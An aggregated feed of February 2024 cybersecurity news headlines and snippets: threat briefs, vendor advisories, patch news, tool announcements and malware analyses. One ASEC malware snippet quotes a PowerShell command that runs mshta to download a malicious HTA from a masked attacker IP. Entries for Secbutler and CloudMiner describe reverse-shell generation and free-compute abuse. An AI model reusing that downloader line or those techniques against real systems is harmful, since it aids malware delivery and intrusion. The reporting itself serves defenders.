Tim Chase, Field CISO at Lacework, recently sat down with Rahul Gupta, Head of Security and Governance, Risk, and Compliance (GRC) at Sigma Computing. The two discussed a wide range of topics, including Gupta's perspective on the evolving security industry, how to attract and retain talent, things to look for in a security solution, the impacts of generative AI in cybersecurity, and much more.TIM: Tell me about your role as Head of Security and GRC at Sigma Computing.RAHUL:In my role at Sigma...
https://cloudsecurityalliance.org/articles/from-security-evolution-to-generative-ai-a-q-a-with-an-industry-leader
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Threat Brief: Attacks on Critical Infrastructure Attributed to Insidious Taurus (Volt Typhoon)
Insidious Taurus, aka Volt Typhoon, is a nation-state TA attributed to the People's Republic of China. We provide an overview of their current activity and mitigations recommendations. The post Threat Brief: Attacks on Critical Infrastructure Attributed to Insidious Taurus (Volt Typhoon) appeared first on Unit 42.
https://unit42.paloaltonetworks.com/volt-typhoon-threat-brief/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Latest Microsoft Midnight Blizzard Breach is a Wakeup Call for SaaS Security
Originally published by Valence. Microsoft recently published new guidance on the nation-state attack that they initially disclosed on January 19. According to Microsoft, the Russian state-sponsored threat actor Midnight Blizzard (also known as NOBELIUM or APT29) was able to leverage a test tenant account and a legacy OAuth application to gain access to corporate email accounts, including members of senior leadership, cybersecurity team, legal team, and others, and exfiltrated some emails and...
https://cloudsecurityalliance.org/articles/the-latest-microsoft-midnight-blizzard-breach-is-a-wakeup-call-for-saas-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Addressing Microsoft Teams Phishing Threats
Originally published by Adaptive Shield.Written by Hananel Livneh. AT&T Cybersecurity recently discovered phishing attacks conducted over Microsoft Teams. During a group chat, threat actors distributed malicious attachments to employees, which led to the installation of DarkGate malware on the victim's systems. This attack shines a bright light on the everchanging phishing surface as it expands from email to communication applications like Teams. This blog post will shed light on the atta...
https://cloudsecurityalliance.org/articles/addressing-microsoft-teams-phishing-threats
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bumblebee malware wakes from hibernation, forgets what year it is, attacks with macros

https://www.proofpoint.com/us/newsroom/news/bumblebee-malware-wakes-hibernation-forgets-what-year-it-attacks-macros
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

U.S. Internet Leaked Years of Internal, Customer Emails
The Minnesota-based Internet provider U.S. Internet Corp. has a business unit called Securence, which specializes in providing filtered, secure email services to businesses, educational institutions and government agencies worldwide. But until it was notified last week, U.S. Internet was publishing more than a decade's worth of its internal email -- and that of thousands of Securence clients -- in plain text out on the Internet and just a click away for anyone with a Web browser.
https://krebsonsecurity.com/2024/02/u-s-internet-leaked-years-of-internal-customer-emails/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Navigating Cyberattacks And The Power Of AI-Driven Cybersecurity Solutions
This week in cybersecurity from the editors at Cybercrime Magazine – Read the full story in PhillyVoice Sausalito, Calif. – Feb. 14, 2024 Cybersecurity Ventures predicts that by 2025, cybercrime could cost the world a staggering .5 trillion annually, up from trillion in 2015. AI’s The post Navigating Cyberattacks And The Power Of AI-Driven Cybersecurity Solutions appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/navigating-cyberattacks-and-the-power-of-ai-driven-cybersecurity-solutions/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Audio deepfakes: Celebrity-endorsed giveaway scams and fraudulent investment opportunities flood social media platforms
Bitdefender Labs has been keeping up with the latest modus operandi of cybercrooks who adapt emerging technologies to siphon money from consumers. Artificial intelligence is just one of the many tools that help in the creation and successful dissemination of online schemes to extort money and sensitive information. This paper focuses on voice cloning (audio deepfakes) schemes and how they are proliferated via social media to trick unsuspecting victims. Before delving deeper into the main subj
https://www.bitdefender.com/blog/labs/audio-deepfakes-celebrity-endorsed-giveaway-scams-and-fraudulent-investment-opportunities-flood-social-media-platforms/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Paving a Path to Systems Administration: Naeem Jones' Journey with Rapid7
Prior to becoming a Systems Administrator at Rapid7, Naeem Jones entered his career in cybersecurity through the Hack. Diversity program. Hack.
https://blog.rapid7.com/2024/02/14/paving-a-path-to-systems-administration-naeem-jones-journey-with-rapid7/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Complete Guide to Breach and Attack Simulation
In today’s ever-evolving digital landscape, safeguarding your organization’s cyber infrastructure is crucial. With countless security… A Complete Guide to Breach and Attack Simulation on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/02/14/a-complete-guide-to-breach-and-attack-simulation/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Static Application Security Testing
In cybersecurity, businesses are increasingly accepting the pivotal role of robust application security measures. A… Static Application Security Testing on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/02/14/static-application-security-testing/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

NIST Celebrates National Entrepreneurship Week
What is National Entrepreneurship (NatlEshipWeek) Week? Celebrated February 10-17, 2024, “NatlEshipWeek is a congressionally chartered week dedicated to empowering entrepreneurship across the United States. The annual initiative was relaunched in 2017 as NatlEshipWeek to bring together a network of partners from Maui to Miami to educate, engage, and build equitable access to America's Entrepreneurship Ecosystem.” Follow along online with #NatlEshipWeek. You can learn more about the initiative here: https://www.natleshipweek.org/about . Supporting Entrepreneurship is at the Heart of NIST's
https://www.nist.gov/blogs/cybersecurity-insights/nist-celebrates-national-entrepreneurship-week
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Staying ahead of threat actors in the age of AI
Microsoft, in collaboration with OpenAI, is publishing research on emerging threats in the age of AI, focusing on identified activity associated with known threat actors Forest Blizzard, Emerald Sleet, Crimson Sandstorm, and others. The observed activity includes prompt-injections, attempted misuse of large language models (LLM), and fraud. The post Staying ahead of threat actors in the age of AI appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cyber Signals: Navigating cyberthreats and strengthening defenses in the era of AI
Today we released the sixth edition of Cyber Signals, spotlighting the remarkable interest and impact driven by AI on the cybersecurity landscape. This includes new, joint threat intelligence Microsoft is sharing with our OpenAI partners, detailing how we are protecting AI platforms from attempted abuse by threat actors. The post Cyber Signals: Navigating cyberthreats and strengthening defenses in the era of AI appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/02/14/cyber-signals-navigating-cyberthreats-and-strengthening-defenses-in-the-era-of-ai/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Secbutler - The Perfect Butler For Pentesters, Bug-Bounty Hunters And Security Researchers
Essential utilities for pentester, bug-bounty hunters and security researchers secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth). The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!Features Generate a reverse shell command Obtain proxy Download & deploy common payloads Obtain reverse shell listener command Generate bash install script for common tools Generate bash download script for Wordlists Read common cheatsheets...
http://www.kitploit.com/2024/02/secbutler-perfect-butler-for-pentesters.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Kimsuky Group's Spear Phishing Detected by AhnLab EDR (AppleSeed, AlphaSeed)
Kimsuky threat group, deemed to be supported by North Korea, has been active since 2013. At first, they attacked North Korea-related research institutes in South Korea before attacking a South Korean energy corporation in 2014, and have expanded their attacks to other countries since 2017 [1]. The group has mainly been attacking the national defense, defense industry, media, government organizations, and academic areas to steal internal data and technologies from them [2] (This report supports Korean only for now.) The... The post Kimsuky Group’s Spear Phishing Detected by AhnLab EDR (AppleSeed, AlphaSeed) appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/61631/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fat Patch Tuesday, February 2024 Edition
Microsoft Corp. today pushed software updates to plug more than 70 security holes in its Windows operating systems and related products, including two zero-day vulnerabilities that are already being exploited in active attacks.
https://krebsonsecurity.com/2024/02/fat-patch-tuesday-february-2024-edition/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Patch Tuesday - February 2024
Windows SmartScreen & Internet Shortcut EitW. Office Protected Mode bypass. Exchange critical elevation of privilege.
https://blog.rapid7.com/2024/02/13/patch-tuesday-february-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CVE-2023-47218: QNAP QTS and QuTS Hero Unauthenticated Command Injection (FIXED)
Rapid7 has identified an unauthenticated command injection vulnerability in the QNAP operating system known as QTS, a core part of the firmware for numerous QNAP entry- and mid-level Network Attached Storage (NAS) devices.
https://blog.rapid7.com/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AI and cyber security: what you need to know
Understanding the risks - and benefits - of using AI tools.
https://www.ncsc.gov.uk/guidance/ai-and-cyber-security-what-you-need-to-know
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Data residency: What is it and why it is important?
Data residency is a hot topic, especially for cloud data. The reason is multi-faceted, but the focus has been driven by the General Data Protection Regulation (GDPR), which governs information privacy in the European Union and the European Economic Area. The GDPR defines the requirement that users’ personal data and privacy be adequately protected by […] The post Data residency: What is it and why it is important? appeared first on Security Intelligence.
https://securityintelligence.com/posts/data-residency-why-is-it-important/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

GenAI-Based Application Security 101
Gain insights into GenAI applications and how they represent an innovative category of technology, leveraging Large Language Models (LLMs) at their core.
https://www.legitsecurity.com/blog/genai-based-application-security-101
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

1-15 December 2023 Cyber Attacks Timeline
In early December 2023, event recordings decreased significantly to 135, with ransomware dominating 35.5% of incidents. The period saw a notable data breach at ESO Solutions, affecting 2.7 million patients, and a .7 million crypto theft at OKX. Geopolitical tensions spurred active cyber espionage, with APT28 exploiting critical vulnerabilities. The author encourages timeline review and community risk awareness support.
https://www.hackmageddon.com/2024/02/13/1-15-december-2023-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Decrypted: Rhysida Ransomware
The team at Avast has developed a decryptor for the Rhysida ransomware and released it for public download. The Rhysida ransomware has been active since May 2023. As of Feb 2024, their TOR site lists 78 attacked companies, including IT (Information Technology) sector, healthcare, universities, and government organizations. The post Decrypted: Rhysida Ransomware appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-rhysida-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-rhysida-ransomware
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Vulnerability in QNAP QTS Firmware: CVE-2023-50358
New zero-day vulnerability CVE-2023-50358 affects QNAP Network Attached Storage (NAS) devices. Our analysis includes its impact determined by our product data. The post New Vulnerability in QNAP QTS Firmware: CVE-2023-50358 appeared first on Unit 42.
https://unit42.paloaltonetworks.com/qnap-qts-firmware-cve-2023-50358/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Deepfakes in the global election year of 2024: A weapon of mass deception?
As fabricated images, videos and audio clips of real people go mainstream, the prospect of a firehose of AI-powered disinformation is a cause for mounting concern
https://www.welivesecurity.com/en/cybersecurity/deepfakes-election-year-2024-weapon-mass-deception/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Unleashing the power of cloud with containerisation
New NCSC guidance describes how organisations can make the most of containerisation.
https://www.ncsc.gov.uk/blog-post/unleashing-the-power-of-cloud-with-containerisation
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

QR Codes - what's the real risk?
How safe is it to scan that QR code in the pub? Or in that email?
https://www.ncsc.gov.uk/blog-post/qr-codes-whats-real-risk
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Phishing attacks: defending your organisation
How to defend your organisation from email phishing attacks.
https://www.ncsc.gov.uk/guidance/phishing
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft BitLocker Bypasses are Practical
In this blog article, we would like to share key insights from the "Defeating Microsoft's Default BitLocker Implementation" security training by Hands-On Security and emphasize the potential risks and consequences associated with this attack technique. Our target audience includes businesses looking to safeguard sensitive data on their Windows devices, as well as individuals with an elevated requirement for protecting their data.
https://blog.compass-security.com/2024/02/microsoft-bitlocker-bypasses-are-practical/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FortiNAC - XSS in Show Audit Log
An improper neutralization of input during web page generation vulnerability [CWE-79] in FortiNAC may allow a remote unauthenticated attacker to perform a stored cross site scripting (XSS) attack via the name fields observed in the policy audit logs.
https://fortiguard.fortinet.com/psirt/FG-IR-23-063
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bypassing EDRs With EDR-Preloading
Evading user mode EDR hooks by hijacking the AppVerifier layer
https://malwaretech.com/2024/02/bypassing-edrs-with-edr-preload.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fileless Revenge RAT Malware
AhnLab SEcurity intelligence Center (ASEC) recently discovered the distribution of Revenge RAT malware that had been developed based on legitimate tools. It appears that the attackers have used tools such as ‘smtp-validator’ and ‘Email To Sms’. At the time of execution, the malware creates and runs both a legitimate tool and a malicious file, making it difficult for users to realize that a malicious activity has occurred. As shown in the code below, the threat actor creates and runs Setup.exe... The post Fileless Revenge RAT Malware appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/61584/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

North Korea's DMARC spoofing tricks

https://www.proofpoint.com/us/newsroom/news/north-koreas-dmarc-spoofing-tricks
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ongoing campaign compromises senior execs' Azure accounts, locks them using MFA

https://www.proofpoint.com/us/newsroom/news/ongoing-campaign-compromises-senior-execs-azure-accounts-locks-them-using-mfa
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The architecture of SAST tools: An explainer for developers
More developers will have to fix security issues in the age of shifting left. Here, we break down how SAST tools can help them find and address vulnerabilities. The post The architecture of SAST tools: An explainer for developers appeared first on The GitHub Blog.
https://github.blog/2024-02-12-the-architecture-of-sast-tools-an-explainer-for-developers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Diving Into Glupteba's UEFI Bootkit
A 2023 Glupteba campaign includes an unreported feature — a UEFI bootkit. We analyze its complex architecture and how this botnet has evolved. The post Diving Into Glupteba's UEFI Bootkit appeared first on Unit 42.
https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Critical Fortinet FortiOS CVE-2024-21762 Exploited
CVE-2024-21762 is a critical out-of-bounds write vulnerability in Fortinet's FortiOS operating system that is known to have been exploited in the wild. Fortinet SSL VPN vulnerabilities are frequent targets for state-sponsored and other motivated adversaries.
https://blog.rapid7.com/2024/02/12/etr-critical-fortinet-fortios-cve-2024-21762-exploited/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Serious Security Vulnerability Patched In Shield Security WP Plugin
A serious security vulnerability affected the WordPress plugin Security Shield, which could allow arbitrary file… Serious Security Vulnerability Patched In Shield Security WP Plugin on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/02/10/serious-security-vulnerability-patched-in-shield-security-wp-plugin/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SqliSniper - Advanced Time-based Blind SQL Injection Fuzzer For HTTP Headers
SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threaded, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminates false positives through and send alerts upon detection, with the built-in Discord notification functionality. Key Features Time-Based Blind SQL Injection Detection: Pinpoints potential SQL injection vulnerabilities in HTTP headers. Multi-Threaded Scanning: Offers faster scanning capabilities through concurrent processing. Discord Notifications: Sends alerts via Discord webhook for detected vulnerabilities. False Positive Checks: Implements response time analysis...
http://www.kitploit.com/2024/02/sqlisniper-advanced-time-based-blind.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How DevOps evolved into DevSecOps: Embracing security in software development
The journey from DevOps to DevSecOps signifies a shift towards valuing security more prominently in how you create and maintain code, highlighting its increased importance within your software development and operations.
https://blog.sonatype.com/how-devops-evolved-into-devsecops-embracing-security-in-software-development
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Metasploit Weekly Wrap-Up 02/09/2024
This weeks wrap up includes three new exploits for docker, Fortra GoAnywhere and Cacti.
https://blog.rapid7.com/2024/02/09/metasploit-weekly-wrap-up-02-09-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Closing the Security Gap: Navigating Modern Technology and Outdated Systems in Linux Security
Most businesses understand the need for cybersecurity. However, many of those same companies still rely on outdated systems, making it hard to ensure the security they know they need.
https://linuxsecurity.com/features/features/closing-the-linux-security-gap
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Some DMARC questions answered, as deadlines near

https://www.proofpoint.com/us/newsroom/news/some-dmarc-questions-answered-deadlines-near
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Detailed Guide on Ligolo-Ng
This comprehensive guide delves into the intricacies of Lateral Movement utilizing Ligolo-Ng, a tool developed by Nicolas Chatelain. The Ligolo-Ng tool facilitates the establishment of
https://www.hackingarticles.in/a-detailed-guide-on-ligolo-ng/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Juniper Support Portal Exposed Customer Device Info
Until earlier this week, the support website for networking equipment vendor Juniper Networks was exposing potentially sensitive information tied to customer products, including the exact devices each customer bought, as well as each device's warranty status, service contracts and serial numbers. Juniper said it has since fixed the problem, and that the inadvertent data exposure stemmed from a recent upgrade to its support portal.
https://krebsonsecurity.com/2024/02/juniper-support-portal-exposed-customer-device-info/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ransomware payments hit a record high in 2023 – Week in security with Tony Anscombe
Called a "watershed year for ransomware", 2023 marked a reversal from the decline in ransomware payments observed in the previous year
https://www.welivesecurity.com/en/videos/ransomware-payments-record-week-security-tony-anscombe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CloudMiner - Execute Code Using Azure Automation Service Without Getting Charged
Execute code within Azure Automation service without getting charged Description CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization. This flow was reported to Microsoft on 3/23 which decided to not change the service behavior as it's considered as "by design". As for 3/9/23, this tool can still be used without getting charged. Each execution is limited to 3 hours Requirements Python 3.8+ with the libraries mentioned in the file requirements.txt Configured Azure CLI - https://learn.microsoft.com/en-us/cli/azure/install-azure-cli...
http://www.kitploit.com/2024/02/cloudminer-execute-code-using-azure.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Critical Vulnerability Could Allow Mastodon Account Takeover
Heads up, Mastodon admins! A critical security vulnerability riddled Mastodon, allowing account takeover by an… Critical Vulnerability Could Allow Mastodon Account Takeover on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/02/08/critical-vulnerability-could-allow-mastodon-account-takeover/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New macOS Backdoor Written in Rust Shows Possible Link with Windows Ransomware Group
UPDATE: Following our initial release, we have been contacted by our fellow researchers at Jamf who were able to identify three more samples that act like first-stage payloads. They are responsible for downloading the backdoor: * e7cab6f2be47940bf36e279bbec54ec7 - Jobinfo.app.zip * 26d6a7e3507edf9953684d367dcd44bd - Jobinfo.zip * 775851f86cbde630808ff6d2cf8cedbf - Jobinfo.zip Combined with information in our previous research, the investigation of these samples revealed new components of t
https://www.bitdefender.com/blog/labs/new-macos-backdoor-written-in-rust-shows-possible-link-with-windows-ransomware-group/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft Copilot for Security provides immediate impact for the Microsoft Defender Experts team
Microsoft Copilot for Security provides tangible applications to the Defender Experts' daily work—including building incident narratives, analyzing threats, time-saving tips, upskilling, and more. The post Microsoft Copilot for Security provides immediate impact for the Microsoft Defender Experts team appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/02/08/microsoft-copilot-for-security-provides-immediate-impact-for-the-microsoft-defender-experts-team/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Malicious Android Apps On Google Play Store Deliver VajraSpy RAT
Heads up, Android users! Another wave of malicious apps has flooded the Google Play Store… Malicious Android Apps On Google Play Store Deliver VajraSpy RAT on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/02/08/malicious-android-apps-on-google-play-store-deliver-vajraspy-rat/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

NIST's International Cybersecurity and Privacy Engagement Update – International Dialogues, Workshops, and Translations
With the new year under way, NIST is continuing to engage with our international partners to enhance cybersecurity. Here are some updates on our international work from the end of 2023 into the beginning of 2024: Conversations have continued with our partners throughout the world on the update to the NIST Cybersecurity Framework (CSF) 2.0 . The current Draft CSF 2.0 has been shared in a public comment period that ended in November 2023. Stay tuned for the final version to be published soon! NIST international engagement continues through our support to the Department of State and the
https://www.nist.gov/blogs/cybersecurity-insights/nists-international-cybersecurity-and-privacy-engagement-update
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SADProtocol goes to Hollywood
Faraday's researchers Javier Aguinaga and Octavio Gianatiempo have investigated on IP cameras and two high severity vulnerabilities.This research project began when Aguinaga's wife, a former Research leader at Faraday Security, informed him that their IP camera had stopped working. Although Javier was initially asked to fix it, being a security researcher, opted for a more unconventional approach to tackle the problem. He brought the camera to their office and discussed the issue with Gianatiempo, another security researcher at Faraday. The situation quickly escalated from some light reverse engineering to a full-fledged vulnerability research project, which ended with two high-severity bugs and an exploitation strategy worthy of the big screen.They uncovered two LAN remote code execution...
http://www.kitploit.com/2024/02/sadprotocol-goes-to-hollywood.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The buck stops here: Why the stakes are high for CISOs
Heavy workloads and the specter of personal liability for incidents take a toll on security leaders, so much so that many of them look for the exits. What does this mean for corporate cyber-defenses?
https://www.welivesecurity.com/en/business-security/buck-stops-stakes-high-cisos/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Coyote: A multi-stage banking Trojan abusing the Squirrel installer
We will delve into the workings of the infection chain and explore the capabilities of the new Trojan that specifically targets users of more than 60 banking institutions, mainly from Brazil.
https://securelist.com/coyote-multi-stage-banking-trojan/111846/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

BlueShell Used in Attacks Against Linux Systems in Korea (2)
AhnLab SEcurity intelligence Center (ASEC) previously uploaded the article “BlueShell Used in APT Attacks Against Korean and Thai Targets” [1] on the ASEC blog which introduced BlueShell malware strains that were used against Linux systems in Thailand and Korea. The threat actor customized the BlueShell backdoor malware for their attack, and configured the malware’s operating condition to only work in specific systems. Even after the article’s release, the BlueShell malware strains developed by the same threat actor are being continuously collected... The post BlueShell Used in Attacks Against Linux Systems in Korea (2) appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/61549/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FortiClientEMS - Improper privilege management for site super administrator
An improper privilege management vulnerability [CWE-269] in FortiClientEMS graphical administrative interface may allow an Site administrator with Super Admin privileges to perform global administrative operations affecting other sites via crafted HTTP or HTTPS requests.
https://fortiguard.fortinet.com/psirt/FG-IR-23-357
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FortiManager - Informative error messages
An exposure of sensitive information to an unauthorized actor vulnerability [CWE-200] in FortiManager, FortiAnalyzer & FortiAnalyzer-BigData may allow an adom administrator to enumerate other adoms and device names via crafted HTTP or HTTPS requests.
https://fortiguard.fortinet.com/psirt/FG-IR-23-268
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FortiOS - Format String Bug in fgfmd
A use of externally-controlled format string vulnerability [CWE-134] in FortiOS fgfmd daemon may allow a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted requests.
https://fortiguard.fortinet.com/psirt/FG-IR-24-029
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FortiOS - Fortilink lack of certificate validation
An improper certificate validation vulnerability [CWE-295] in FortiOS may allow an unauthenticated attacker in a Man-in-the-Middle position to decipher and alter the FortiLink communication channel between the FortiOS device and a FortiSwitch instance.
https://fortiguard.fortinet.com/psirt/FG-IR-23-301
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FortiOS & FortiProxy - CVE-2023-44487 - Rapid Reset HTTP/2 vulnerability
The Fortinet Product Security team has evaluated the impact of the vulnerablity HTTP/2 Rapid Reset Attack, listed below: CVE-2023-44487: The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly. https://nvd.nist.gov/vuln/detail/CVE-2023-44487
https://fortiguard.fortinet.com/psirt/FG-IR-23-397
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FortiOS/FortiProxy - Out-of-bound Write in sslvpnd
A out-of-bounds write vulnerability [CWE-787] in FortiOS and FortiProxy may allow a remote unauthenticated attacker to execute arbitrary code or command via specially crafted HTTP requests. Workaround : disable SSL VPN (disable webmode is NOT a valid workaround) Note: This is potentially being exploited in the wild.
https://fortiguard.fortinet.com/psirt/FG-IR-24-015
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

From Cybercrime Saul Goodman to the Russian GRU
In 2021, the exclusive Russian cybercrime forum Mazafaka was hacked. The leaked user database shows one of the forum's founders was an attorney who advised Russia's top hackers on the legal risks of their work, and what to do if they got caught. A review of this user's hacker identities shows that during his time on the forums he served as an officer in the special forces of the GRU, the foreign military intelligence agency of the Russian Federation.
https://krebsonsecurity.com/2024/02/from-cybercrime-saul-goodman-to-the-russian-gru/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.3.0 feature release and 1.2.2, 1.0.5 security patch release!
The ClamAV 1.3.0 feature release is now stable!Today, we are also publishing the 1.2.2 and 1.0.5 security patch versions. ClamAV 1.1 is past EOL for security fixes and will not receive an update. Switch to the 1.0 LTS, 1.2, or 1.3 versions for continued support.The release files are available for download on the ClamAV downloads page, on the Github Release page, and through Docker Hub*:Alpine-based imagesDebian-based multi-arch images*The Docker images are built on release day and may not be available until later in the day.Continue reading to learn what changed in each version.1.3.0ClamAV 1.3.0 includes the following improvements and changes:Major changesAdded support for extracting and scanning attachments found in Microsoft OneNote section files. OneNote parsing will be enabled by default,...
http://blog.clamav.net/2023/11/clamav-130-122-105-released.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

5 Insights from the Latest Cybersecurity Trends Research
we've singled out five quick insights security professionals and stakeholders should consider when looking ahead. These findings are based on Top Trends in Cybersecurity for 2024, a new research report from Gartner®.
https://blog.rapid7.com/2024/02/07/5-insights-from-the-latest-cybersecurity-trends-research/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Back to basics: Better security in the AI era
The rise of artificial intelligence (AI), large language models (LLM) and IoT solutions has created a new security landscape. From generative AI tools that can be taught to create malicious code to the exploitation of connected devices as a way for attackers to move laterally across networks, enterprise IT teams find themselves constantly running to […] The post Back to basics: Better security in the AI era appeared first on Security Intelligence.
https://securityintelligence.com/articles/back-to-basics-better-security-ai/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Avast Q4/2023 Threat Report
10 Billion Attacks Blocked in 2023, Qakbot's Resurrection, and Google API Abused The post Avast Q4/2023 Threat Report appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/avast-q4-2023-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=avast-q4-2023-threat-report
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Navigating the Shift: Unveiling the changes in PCI DSS version 4
Gain insights in the latest changes in PCI DSS version 4 with this quick overview, highlighting the primary changes and how to best prepare for them.
https://www.legitsecurity.com/blog/navigating-the-shift-unveiling-the-changes-in-pci-dss-version-4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Distribution of RAT Malware Disguised as a Gambling-related File
AhnLab SEcurity intelligence Center (ASEC) has identified the distribution of RAT malware disguised as an illegal gambling-related file. Like the distribution method of VenomRAT introduced last month ([1]), the malware is spread via a shortcut (.lnk) file, and it downloads the RAT directly from HTA. The distributed shortcut file contains a malicious PowerShell command which runs mshta and downloads the malicious script. PowerShell command C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.*  ‘hxxp://193.***.***[.]253:7287/2.hta.hta' The malicious URLs in the confirmed shortcut file are as follows: hxxp://193.***.***[.]253:7287/2.hta.hta... The post Distribution of RAT Malware Disguised as a Gambling-related File appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/61335/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Piloting new ways of protecting Android users from financial fraud
Posted by Eugene Liderman, Director of Mobile Security Strategy, Google From its founding, Android has been guided by principles of openness, transparency, safety, and choice. Android gives you the freedom to choose which device best fits your needs, while also providing the flexibility to download apps from a variety of sources, including preloaded app stores such as the Google Play Store or the Galaxy Store; third-party app stores; and direct downloads from the Internet.Keeping users safe in an open ecosystem takes sophisticated defenses. That's why Android provides multiple layers of protections, powered by AI and backed by a large dedicated security & privacy team, to help to protect our users from security threats while continually making the platform more resilient. We also provide...
http://security.googleblog.com/2024/02/piloting-new-ways-to-protect-Android-users-from financial-fraud.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Data Leak Detected by AhnLab EDR (vs. Ransomware Threat Actors)
